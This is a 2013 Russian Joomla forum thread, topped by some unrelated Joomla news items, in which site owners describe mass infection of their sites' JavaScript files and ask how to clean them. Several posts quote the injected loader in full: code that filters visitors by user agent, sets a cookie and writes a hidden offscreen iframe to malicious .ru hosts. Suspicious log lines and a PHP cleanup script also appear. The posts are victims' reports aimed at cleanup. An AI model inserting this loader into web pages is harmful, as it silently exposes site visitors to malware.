Новости Joomla

Модуль Яндекс.Карт для Joomla WT Yandex map items v.2.0.4

Модуль выводит метки из различных компонентов на Яндекс.Карты. На данный момент выводятся только материалы Joomla. Используется API 3.0 Яндекс.Карт. Поддерживается Joomla 4, Joomla 5 и старше. PHP 8+.

Вышел JoomShopping 5.8.0 - компонент интернет-магазина для Joomla

Список изменений:

  • добавлена галочка "обязательный" для атрибутов
  • атрибуты, значения, свободные атрибуты, характеристики и их значения могут быть опубликованы / не опубликованы
  • добавлены новые триггеры для плагинов- обновление немецкой локализации
  • сортировка логов для администраторов в режиме разработчика
  • выбор видео, файлов и демо-файлов товара из папки на сервере
  • исправления роутера (построение ссылок JoomShopping)
  • редактирование заказа: автоматический расчет налогов
  • для разработчиков аддонов: новый метод addMultiLangFieldTable
  • правки тёмной темы и другие изменения.

Обзор некоторых из них можно посмотреть в видео на YouTube.

Joomla. Когда они это починят?

Статья Joomla Community Magazine 2015 года, но тема в ней актуальна была и до и после её публикации. Проблема, которая поднимается в этой статье касается не только Joomla, но и любого программного обеспечения.

Каждый раз, когда выходит новая версия всегда найдутся люди, спрашивающие: "Когда они это починят?". Или вопиющих: "этой проблеме уже много лет!". Но для того, чтобы ошибку исправить нужно чтобы кто-то её обнаружил. И не только обнаружил, но и сообщил об этом. Тогда вероятность того, что ошибку исправят будет гораздо выше.

1 2 3 ... 12   Вниз
0 Пользователей и 1 Гость просматривают эту тему.
  • 356 Ответов
  • 74432 Просмотров
*

Stich SPb

  • Захожу иногда
  • 231
  • 5 / 0
[Решено] Заразились в один день 4 аккаунта по 10 сайтов
« : 25.03.2013, 13:29:48 »
Левый код в скриптах ниже.
Не могу понять как это попало. Все сайты после последнего заражения в январе обновлены.
JCE везде прибит. Версия Jooma 1.5.26


Код
/*214afaae*/(function(){
function stripos (f_haystack, f_needle, f_offset) {
 var haystack = (f_haystack + '').toLowerCase();
 var needle = (f_needle + '').toLowerCase();
 var index = 0;
 if ((index = haystack.indexOf(needle, f_offset))!== -1) {
  return index;
 }
 return false;
}
function zzz_check_ua(){
 var blackList = ['Linux','Macintosh','FreeBSD','Chrome','iPad','iPhone','IEMobile','Chromium','Android','Firefox/18.0','Firefox/18.0.1','Firefox/18.0.2','Firefox/19.0','Firefox/19.0.1','Firefox/19.0.2','SymbianOS'];
 var blackUA = false;
 for (var i in blackList) {
  if (stripos(navigator.userAgent, blackList[i])) {
   blackUA = true;
   break;
  }
 }
 return blackUA;
}
function setCookie(name, value, expires) {
 var date = new Date( new Date().getTime() + expires*1000 );
 document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
 var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
 return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!zzz_check_ua()) {
 var cookie = getCookie('b1004dc22');
 if (cookie == undefined) {
  setCookie('b1004dc22', true, 3600);	
  document.write('<iframe height="115" width="115" style="position:absolute;left:-1000px;top:-1000px;" src="http://impeccablepreselected.ru/JJJ7P.8Qd6?default"></iframe>');
 }
};
})();/*eaa795220*//* begin Page */

« Последнее редактирование: 10.04.2013, 06:40:55 от AlexSmirnov »
Записан
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #1 : 25.03.2013, 19:23:30 »
Так может еще и поискать шелл, бекдор  в файлах сайтов ?
Записан
*

Stich SPb

  • Захожу иногда
  • 231
  • 5 / 0
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #2 : 25.03.2013, 22:02:07 »
Ищу уже сутки
Записан
*

greywolf

  • Осваиваюсь на форуме
  • 16
  • 0 / 0
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #3 : 26.03.2013, 12:43:51 »
В каких файлах код?
Записан
*

JASON X

  • Захожу иногда
  • 155
  • 9 / 0
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #4 : 09.04.2013, 05:02:26 »
У меня заразились все *.js файлы 10 сайтов на 1 акке хостинга. Joomla 1.5.26, 2.5.8, 1.7.5.
Яндекс сегодня прислал письмо, что на 1-м из сайтов есть вредоносный код, но раз у меня такая фигня уже была в январе этого года, то я сразу проверил все сайты где есть *.js файлы и все они оказались заражены.
Предыдущий вирусняк менял дату создания (изменения) файла, а этот хитрее - не меняет.

Код
/*214afaae*/(function(){
function stripos (f_haystack, f_needle, f_offset) {
 var haystack = (f_haystack + '').toLowerCase();
 var needle = (f_needle + '').toLowerCase();
 var index = 0;
 if ((index = haystack.indexOf(needle, f_offset))!== -1) {
  return index;
 }
 return false;
}
function zzz_check_ua(){
 var blackList = ['Linux','Macintosh','FreeBSD','Chrome','iPad','iPhone','IEMobile','Chromium','Android','Firefox/18.0','Firefox/18.0.1','Firefox/18.0.2','Firefox/19.0','Firefox/19.0.1','Firefox/19.0.2','Firefox/20.0','SymbianOS'];
 var blackUA = false;
 for (var i in blackList) {
  if (stripos(navigator.userAgent, blackList[i])) {
   blackUA = true;
   break;
  }
 }
 return blackUA;
}
function setCookie(name, value, expires) {
 var date = new Date( new Date().getTime() + expires*1000 );
 document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
 var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
 return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!zzz_check_ua()) {
 var cookie = getCookie('b1004dc22');
 if (cookie == undefined) {
  setCookie('b1004dc22', true, 259200);	
  document.write('<iframe height="115" width="115" style="position:absolute;left:-1000px;top:-1000px;" src="http://hotbarpaying.ru/rejtmn3.cCvNYTc?default"></iframe>');
 }
};
})();/*eaa795220*/
Записан
*

Go-destroy

  • Захожу иногда
  • 221
  • 4 / 1
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #5 : 09.04.2013, 05:52:48 »
стилеры не дремлют...
Записан
*

wishlight

  • Гуру
  • 5052
  • 314 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #6 : 09.04.2013, 08:31:41 »
Не дочистили значит. Ищите шеллы и бекдоры.
Записан
*

JASON X

  • Захожу иногда
  • 155
  • 9 / 0
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #7 : 09.04.2013, 12:35:50 »
Я забыл упомянуть, что на 1-м из сайтов стояла Joomla 3.0.3 и быстрее всего косяк шёл через неё, т.к. пока 1 из сайтов не был на ней сделан всё было ОК, т.к. до января этого года, а так уже 2-й раз за 3 мес.
Записан
*

JASON X

  • Захожу иногда
  • 155
  • 9 / 0
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #8 : 09.04.2013, 13:30:37 »
Нашёл подозрительные записи в логах нескольких сайтов
176.9.36.168 - - [08/Apr/2013:19:07:58 +0400] "GET / HTTP/1.1" 200 100534 "-" "-"
178.137.166.129 - - [08/Apr/2013:02:30:35 +0400] "GET /main/about-site.html+%5BPLM=0%5D%5BN%5D+GET+http://site.ru/main/about-site.html+%5B0,48462,76401%5D+-%3E+%5BN%5D+POST+http://site.ru/main/about-site.html+%5B0,0,76401%5D+-%3E+%5BN%5D+GET+http://site.ru/main/about-site.html+%5B75305,0,76401%5D HTTP/1.0" 404 389 "http://www.bestplacevanquepated1978.xpg.com.br/v-kakom-banke-mozhno-vzyat-kredit-v-razmere-ot-700000-do-1000000.html" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
94.77.186.182 - - [08/Apr/2013:18:59:43 +0400] "GET /components/com_phocagallery/assets/images/shahttp://site.ru/administrator/index.php?option=com_content%C2%A7ionid=11&task=edit&cid[]=182 HTTP/1.1" 404 920 "http://site.ru/natali-leshhenko.html" "Opera/9.80 (Windows NT 6.1; Win64; x64; U; Edition Next; ru) Presto/2.11.310 Version/12.50"
178.137.166.129 - - [09/Apr/2013:03:27:27 +0400] "GET /ad/add-ad.html+%5BPLM=0%5D+GET+http://site.ru/ad/add-ad.html+%5B0,42200,50519%5D+-%3E+%5BN%5D+POST+http://site.ru/ad/add-ad.html+%5B0,0,52134%5D HTTP/1.0" 404 389 "http://bestplacetrl6857.boxhost.me/brokery-v-krivoy-rog-vzyat-kredit.html" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
« Последнее редактирование: 09.04.2013, 13:33:53 от JASON X »
Записан
*

PaLyCH

  • Давно я тут
  • 956
  • 146 / 19
  • Менеджер проектов
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #9 : 09.04.2013, 20:48:01 »
Ну вы внимательно изучали файлы, оказалось что заражено не только начало файла, но еще и конец. В конце можно найти иснтуркцию
Код: html4strict
;;document.write('<iframe src="http://muhost.mrslove.com/7adc59e6.BemrmfFYEukF?default" name="Olegor" height="90" width="90" style="left:-500px;top:0px;position:fixed;"></iframe>');
Записан
*

JASON X

  • Захожу иногда
  • 155
  • 9 / 0
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #10 : 09.04.2013, 20:55:15 »
Зашёл на свои сайты минут 20 назад проверил и оказалось, что дополнительного вредоносного кода нету, ни на 1-м сайте, но доступ то остался у этих плохих людей....
Записан
*

AlexSmirnov

  • Завсегдатай
  • 1862
  • 272 / 16
  • Ищите и найдете
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #11 : 09.04.2013, 21:05:14 »
Варез был/есть на тех сайтах?
Записан
# Back the fufalo (особенно ту самую столкершу)! #
# ВАЖНО! Кайфую от удаления присланного в личку спама, почти как от любви (особенно по выходным). #
*

PaLyCH

  • Давно я тут
  • 956
  • 146 / 19
  • Менеджер проектов
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #12 : 09.04.2013, 21:13:07 »
Цитата: AlexSmirnov от 09.04.2013, 21:05:14
Варез был/есть на тех сайтах?

Походу его там полно.

Цитата: JASON X от 09.04.2013, 20:55:15
Зашёл на свои сайты минут 20 назад проверил и оказалось, что дополнительного вредоносного кода нету, ни на 1-м сайте, но доступ то остался у этих плохих людей....

Дык вроде почистил
Записан
*

JASON X

  • Захожу иногда
  • 155
  • 9 / 0
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #13 : 10.04.2013, 06:21:17 »
Цитата: AlexSmirnov от 09.04.2013, 21:05:14
Варез был/есть на тех сайтах?
Если Вы имеете в виду скачанные не с оф сайтов расширения, то да, были, в частности и сам шабл. Тем более не всё я делал, что-то и друг делал.
Понятно, что, скажем так, нежелательно использовать варез, но когда я только начинал делать сайты, то не было ни денег ни опыта, новый сайт уже буду создавать учтя все косяки и буду покупать расширения.

Закончил чистку, восстановил все сайты из чистых бэкапов, не стал заморачиватсья со скриптами, которые мне почистят файлы, так для меня проще, тем более что уже опыт есть.
« Последнее редактирование: 10.04.2013, 06:28:16 от JASON X »
Записан
*

nbserg

  • Захожу иногда
  • 166
  • 0 / 0
RE: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #14 : 29.04.2013, 19:01:59 »
и что же тут решено?
уязвимость откуда?
раньше
Код
 ;;document.write('<iframe src="http://muhost.mrslove.com/7adc59e6.BemrmfFYEukF?default" name="Olegor" height="90" width="90" style="left:-500px;top:0px;position:fixed;"></iframe>');
это был в JCE
а теперь из за чего?
Записан
*

JASON X

  • Захожу иногда
  • 155
  • 9 / 0
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #15 : 02.05.2013, 22:43:29 »
Сейчас проверил и опять.... Вот такой код во всех ява скриптах на всех сайтах на аккаунте:
Код
/*214afaae*/(function(){
function stripos (f_haystack, f_needle, f_offset) {
 var haystack = (f_haystack + '').toLowerCase();
 var needle = (f_needle + '').toLowerCase();
 var index = 0;
 if ((index = haystack.indexOf(needle, f_offset))!== -1) {
  return index;
 }
 return false;
}
function papirosa(){
 var denyList = ['Chrome'];
 var denyUA = false;
 for (var i in denyList) {
  if (stripos(navigator.userAgent, denyList[i])) {
   denyUA = true;
   break;
  }
 }
 return denyUA;
}
function setCookie(name, value, expires) {
 var date = new Date( new Date().getTime() + expires*1000 );
 document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
 var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
 return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!papirosa()) {
 var cookie = getCookie('smy01b199cd');
 if (cookie == undefined) {
  setCookie('smy01b199cd', true, 432001);	
  document.write('<iframe height="117" style="position:absolute;left:-1000px;top:-1000px;" width="117" src="http://myobunsubstantiated.ru/juyt9.XTjoha?default"></iframe>');
 }
};
})();/*eaa795220*//**
Какое-то расширение наверно с багом.
Записан
*

LS_D

  • Захожу иногда
  • 155
  • 16 / 0
Re: Заразились в один день 4 аккаунта по 10 сайто&#
« Ответ #16 : 03.05.2013, 00:31:50 »
Тоже самое, главное сменил все пароли и поставил атрибуты 444 на файлы js, так эта зараза меняет атрибуты на 644 и прописывает этот код. У Вас случаем хостер не рег.ру?
Странно, как скрипт прописывающий код в файл может поменять атрибут или это снова рег.ру нас радует.
« Последнее редактирование: 03.05.2013, 00:43:07 от LS_D »
Записан
*

JASON X

  • Захожу иногда
  • 155
  • 9 / 0
RE: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #17 : 03.05.2013, 00:41:44 »
LS_D тоже менял за этот год поле заражения 2 раза пароли от всего на хостинге (входа в админку хостинга, сайтов, баз данных и т.д.), но всё равно какая-то сволочь всё портит.
Тоже думал о смене прав для ява скриптов, но это вряд ли поможет, т.к. эта хрень получает root права и соответственно может делать что хочет в файлах сайтов.
У меня хостер ihc.ru.
Тут дело не в хостере, а в расширениях, какое-то из них с брешью в безопасности и поэтому через него вирусняк и лезет, а вот какое именно расширение, или может это вообще брешь в самой Joomla 1.5 - это самый большой вопрос.
Записан
*

LS_D

  • Захожу иногда
  • 155
  • 16 / 0
RE: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #18 : 03.05.2013, 00:52:58 »
У меня Joomla 2.5 везде, вот только что именно хз, последнее ставил uddeIM, сейчас снесу прочищи и посмотрю
Записан
*

JASON X

  • Захожу иногда
  • 155
  • 9 / 0
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #19 : 03.05.2013, 01:03:26 »
У меня Jooml'ы разные: Joomla 1.5.26, 1.7.5, 2.5.x. На всех сайтах разные расширения, кроме 1.5.26.
uddeIM у меня ни на1-м из сайтов не установлено.
Сейчас проверил - вирусный скрипт сменился:
Код
/*214afaae*/(function(){
function stripos (f_haystack, f_needle, f_offset) {
 var haystack = (f_haystack + '').toLowerCase();
 var needle = (f_needle + '').toLowerCase();
 var index = 0;
 if ((index = haystack.indexOf(needle, f_offset))!== -1) {
  return index;
 }
 return false;
}
function zzz_check_ua(){
 var blackList = 'Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firefox/20.0';
 blackList = blackList.split('|');

 var blackUA = false;
 for (var i in blackList) {
  if (stripos(navigator.userAgent, blackList[i])!==false) {
   blackUA = true;
   break;
  }
 }
 return blackUA;
}
function setCookie(name, value, expires) {
 var date = new Date( new Date().getTime() + expires*1000 );
 document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
 var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
 return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!zzz_check_ua()) {
 var cookie = getCookie('smy01b199cd');
 if (cookie == undefined) {
  setCookie('smy01b199cd', true, 432001);	
  document.write('<iframe height="115" width="115" style="position:absolute;left:-999px;top:-999px;" src="http://fulldug.ru/ifg.benDa?default"></iframe>');
 }
};
})();/*eaa795220*//*
« Последнее редактирование: 03.05.2013, 01:17:27 от JASON X »
Записан
*

Leva27

  • Осваиваюсь на форуме
  • 41
  • 3 / 0
  • Дальвебстудия
RE: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #20 : 03.05.2013, 03:26:53 »
Заругался Яндекс на содержание вредоносного кода на сайте, начал искать, оказывается пролез на сайт в caption.js и progressbar.js код:

Код
/*214afaae*/(function(){
function stripos (f_haystack, f_needle, f_offset) {
 var haystack = (f_haystack + '').toLowerCase();
 var needle = (f_needle + '').toLowerCase();
 var index = 0;
 if ((index = haystack.indexOf(needle, f_offset))!== -1) {
  return index;
 }
 return false;
}
function zzz_check_ua(){
 var blackList = 'Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firefox/20.0';
 blackList = blackList.split('|');

 var blackUA = false;
 for (var i in blackList) {
  if (stripos(navigator.userAgent, blackList[i])!==false) {
   blackUA = true;
   break;
  }
 }
 return blackUA;
}
function setCookie(name, value, expires) {
 var date = new Date( new Date().getTime() + expires*1000 );
 document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
 var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
 return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!zzz_check_ua()) {
 var cookie = getCookie('smy01b199cd');
 if (cookie == undefined) {
  setCookie('smy01b199cd', true, 432001);	
  document.write('<iframe height="115" width="115" style="position:absolute;left:-999px;top:-999px;" src="http://ibackupplace.ru/jdruy.PGNbn?default"></iframe>');
 }
};
})();/*eaa795220*//*
		GNU General Public License version 2 or later; see LICENSE.txt
*/
var JCaption=new Class({initialize:function(a){this.selector=a;$$(a).each(function(a){this.createCaption(a)},this)},createCaption:function(a){var f=document.createTextNode(a.title),c=document.createElement("div"),d=document.createElement("p"),e=a.getAttribute("width"),b=a.getAttribute("align");if(!e)e=a.width;b||(b=a.getStyle("float"));if(!b)b=a.style.styleFloat;if(b==""||!b)b="none";d.appendChild(f);d.className=this.selector.replace(".","_");a.parentNode.insertBefore(c,a);c.appendChild(a);a.title!=
""&&c.appendChild(d);c.className=this.selector.replace(".","_");c.className=c.className+" "+b;c.setAttribute("style","float:"+b);c.style.width=e+"px"}});;;

Версия Joomla 2.5.11, расширения стоят нормальные, что вы там про JCE говорили?
Записан
*

JASON X

  • Захожу иногда
  • 155
  • 9 / 0
RE: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #21 : 03.05.2013, 08:09:14 »
Leva27 проверьте остальные скрипты - он уже во всех есть. У меня заразил около 10 сайтов на 1 акке и ява скрипты заразились все.
Записан
*

LS_D

  • Захожу иногда
  • 155
  • 16 / 0
RE: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #22 : 03.05.2013, 08:11:16 »
Это не JCE, я его со всех сайтов давно удалил. Буду разносить сайты клиентов по разным хостингам, пролечивать и смотреть на каком и какое расширение с дырой.
Записан
*

SorokinS

  • Захожу иногда
  • 165
  • 12 / 1
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #23 : 03.05.2013, 10:24:11 »
1-3 мая залили sheell  и опять все JS поражены.

Пользую FLS.PHP (http://joomlaforum.ru/index.php/topic,198048.0.html) и REP.PHP (не помню где брал)
первое ищет подозрительные файлы, второй вырезает нужную часть кода из нужных файлов.

В этом заражении вставлен большой, многострочный код.

Я чет никак не могу его засунуть в код реплейсера, подсобите:

Код
<?php
$root  =  $_SERVER['DOCUMENT_ROOT'];
$search = '[b]СЮДА[/b]'; //строка, которую нужно найти в каждом файле и заменить на ''
$thisfile = 'rep.php'; //чтобы в процессе не заменить искомую строку в этом же файле
function find_and_replace($dir,$search,$thisfile)
{

$new_dir = null;
$dir_files = opendir($dir);
    while(false !== ($file = readdir($dir_files)))
    {

        if($file != '.' && $file != '..')
        $new_dir[] = $dir."/".$file;
    }

        if($new_dir)
        foreach($new_dir as $check )
        {
              if((is_file($check)) && (basename($check)!== $thisfile) && ( (strtolower(substr($check,-4)) === '.tpl') || (strtolower(substr($check,-5)) === '.html') || (strtolower(substr($check,-3)) === '.js'))) {
                $handle = fopen($check, "rb");
                $contents = '';
                while (!feof($handle)) {
                  $contents .= fread($handle, 8192);
                }
                fclose($handle);
                if (strpos($contents,$search)!== false) {
                    $file = fopen ($check,"w+");
                    $str = str_replace($search,'',$contents);
                    fputs($file, $str);
                    fclose ($file);
                    echo $check."<br>";
                    }
              }
              elseif(is_dir($check))
              find_and_replace($check,$search,$thisfile);
        }
}
find_and_replace($root,$search,$thisfile);


JS код заражения:

Код
/*214afaae*/(function(){
function stripos (f_haystack, f_needle, f_offset) {
 var haystack = (f_haystack + '').toLowerCase();
 var needle = (f_needle + '').toLowerCase();
 var index = 0;
 if ((index = haystack.indexOf(needle, f_offset))!== -1) {
  return index;
 }
 return false;
}
function papirosa(){
 var denyList = ['Chrome'];
 var denyUA = false;
 for (var i in denyList) {
  if (stripos(navigator.userAgent, denyList[i])) {
   denyUA = true;
   break;
  }
 }
 return denyUA;
}
function setCookie(name, value, expires) {
 var date = new Date( new Date().getTime() + expires*1000 );
 document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
 var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
 return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!papirosa()) {
 var cookie = getCookie('b19ad018sc');
 if (cookie == undefined) {
  setCookie('b19ad018sc', true, 292200);
  document.write('<iframe height="116" style="position:absolute;left:-1000px;top:-1000px;" width="116" src="http://jivemessageoriented.ru/iy7yhd.dgaPnykU?default"></iframe>');
 }
};
})();/*eaa795220*/
Записан
*

SorokinS

  • Захожу иногда
  • 165
  • 12 / 1
RE: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #24 : 03.05.2013, 10:44:12 »
А в теме написано Решено, а где решение? Найдена дыра? В каком компоненте? Или решение - искать бэкдоры?)
Записан
*

RostovDriver

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
RE: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #25 : 03.05.2013, 13:13:12 »
+1 к зараженным
Заражены этим же кодом все js на двух хостингах. После чистки js файлов иногда вредоносный код немного изменяется.
В логах ftp коннектов не было. Пароли к ftp, базе, админке хостинга, админкам сайтов изменил, нигде не сохраняются. В /images все чисто.
Месяц назад была подобная трабла, но тогда Касперский все нашел, причем не только код в js, но и кучу всего в php. Сейчас он да и все остальные ничего в упор не видят. Ругается только Sophos от Яндекса. Впрочем, даже локально в полностью выкачанных сайтах он только код в js находит, который появляется заново после чистки. Так что смысла его косить, пока не найдена дыра просто нет. Я так понимаю, основной код где-то сидит и периодически обновляет или заново прописывает код во все файлы js и пока этого "отца" не найдешь, все бесполезно. Прошу, если кто найдет где он спрятался сообщите мне страдальцу.
Чтобы Яндекс не ругался, отключил загрузку всех js во фронтэнде, но таки в админке они грузятся, так что валить их надо.
Ситуация осложнена тем, что дыра может быть на любом, сайте хостинга, а через него уже все остальные портятся. Я уж и на хостера готов эту траблу списать, хотя вообщем-то тоже бесполезно :)
Записан
*

Adrian1111

  • Захожу иногда
  • 271
  • 1 / 0
RE: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #26 : 03.05.2013, 14:12:44 »
Аналогичная проблема с кодом в .js

Спойлер
[свернуть]

Заражены наверное все js файлы. Кроме того, наделано куча левых файлов с расширением .php с одинаковым содержимым:

Спойлер
[свернуть]
?>

Вирус видит только Яндекс с Софосом на пару. Больше никто не ругается...пока что...

Сайт Joomla - 2.5. JCE не стоит. При заходе с мобильного никаких редиректов не наблюдаю. Может, потому-что все php. файлы с base64_decode( уже удалил.

Записан
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #27 : 03.05.2013, 14:39:52 »
А вы точно не с одного хостинга ?
п.с.
Кстати у JCE при удалении могли файлы остаться на хостинге.
В менеджере расширений не видно JCE , а таблицы в БД тоже остаются
« Последнее редактирование: 03.05.2013, 15:34:18 от draff »
Записан
*

Adrian1111

  • Захожу иногда
  • 271
  • 1 / 0
RE: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #28 : 03.05.2013, 14:51:28 »
У меня хостинг hc.ru.
Записан
*

RostovDriver

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
RE: Заразились в один день 4 аккаунта по 10 сайтов
« Ответ #29 : 03.05.2013, 15:24:26 »
Logol и Kubez
Записан
1 2 3 ... 12   Вверх
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Изолирование папок сайтов на OpenServer

Автор Lemady

 Ответов: 41
Просмотров: 7265 		Последний ответ 29.11.2021, 15:47:31
от KoreshS
[Решено] В php файлах во всех появилась хрень какая-то появилось давно что это ?

Автор altyn

 Ответов: 72
Просмотров: 37835 		Последний ответ 17.01.2019, 00:51:02
от Roki37
Делаю почту в общих настройках через smtp - в тот же день ящик взломан

Автор Mehanick

 Ответов: 22
Просмотров: 1413 		Последний ответ 25.05.2018, 08:11:19
от dmitry_stas
На мобильном не работает сайт (решено, ошибка в андройде)

Автор dragon4x4

 Ответов: 5
Просмотров: 1804 		Последний ответ 01.03.2018, 22:46:10
от dragon4x4
В админке еще один администратор

Автор Lidia

 Ответов: 26
Просмотров: 2355 		Последний ответ 07.12.2017, 16:55:25
от Fess_N